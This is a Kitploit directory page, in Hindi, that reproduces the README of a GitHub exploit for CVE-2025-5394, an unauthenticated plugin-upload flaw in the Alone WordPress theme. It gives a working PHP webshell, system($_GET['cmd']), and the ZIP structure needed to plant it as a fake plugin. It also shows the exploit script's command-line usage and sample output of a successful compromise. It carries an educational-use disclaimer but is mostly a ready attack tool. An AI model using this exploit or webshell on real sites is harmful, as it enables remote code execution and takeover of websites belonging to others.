Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5394 — Alone – चैरिटी बहुउद्देशीय गैर-लाभकारी वर्डप्रेस थीम <= 7.8.3 - प्लगइन इंस्टॉलेशन के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड करने हेतु प्राधिकरण की कमी | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-5394
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – चैरिटी बहुउद्देशीय गैर-लाभकारी वर्डप्रेस थीम <= 7.8.3 - प्लगइन इंस्टॉलेशन के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड करने हेतु प्राधिकरण की कमी

रिपॉजिटरी देखें
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-5394 - Alone थीम में बिना प्रमाणीकरण के मनमाना प्लगइन अपलोड

📌 प्रभावित उत्पाद:

Alone – Charity Multipurpose Non-profit WordPress थीम
संस्करण: <= 7.8.3
CVE: CVE-2025-5394
CVSS स्कोर: 9.8 (गंभीर)

🔥 भेद्यता सारांश:

WordPress के लिए Alone थीम alone_import_pack_install_plugin() फ़ंक्शन पर क्षमता जांच की कमी के कारण मनमाने फ़ाइल अपलोड के प्रति संवेदनशील है।
यह दोष बिना प्रमाणीकरण वाले हमलावरों को दूरस्थ स्थानों से ZIP फ़ाइलें (प्लगइन के रूप में प्रच्छन्न) अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन प्राप्त किया जा सकता है।


⚙️ एक्सप्लॉइट स्क्रिप्ट (Python)

इस रिपॉज़िटरी में एक Python स्क्रिप्ट है जो CVE-2025-5394 के शोषण को स्वचालित करती है।
स्क्रिप्ट संवेदनशील AJAX एक्शन को ट्रिगर करती है और एक नकली प्लगइन (वेबशेल युक्त) को सीधे WordPress सर्वर पर अपलोड करती है।


📁 वेबशेल आवश्यकताएँ:

अपलोड की गई ZIP फ़ाइल की संरचना इस प्रकार होनी चाहिए:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

जहाँ:

  • shell_plugin प्लगइन निर्देशिका है।
  • shell_plugin.php प्लगइन हेडर के साथ एक मान्य PHP प्लगइन फ़ाइल है।
  • PHP फ़ाइल में वेबशेल पेलोड हो सकता है।

shell_plugin.php के अंदर न्यूनतम प्लगइन हेडर का उदाहरण:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 उपयोग उदाहरण:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ सफल आउटपुट:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ अस्वीकरण:

यह स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है।
लेखक इस कोड के उपयोग से की गई किसी भी दुरुपयोग या अवैध गतिविधि के लिए जिम्मेदार नहीं है।
इसे केवल उन सिस्टमों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।


👨‍💻 द्वारा:

Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited

टूल डाउनलोड करें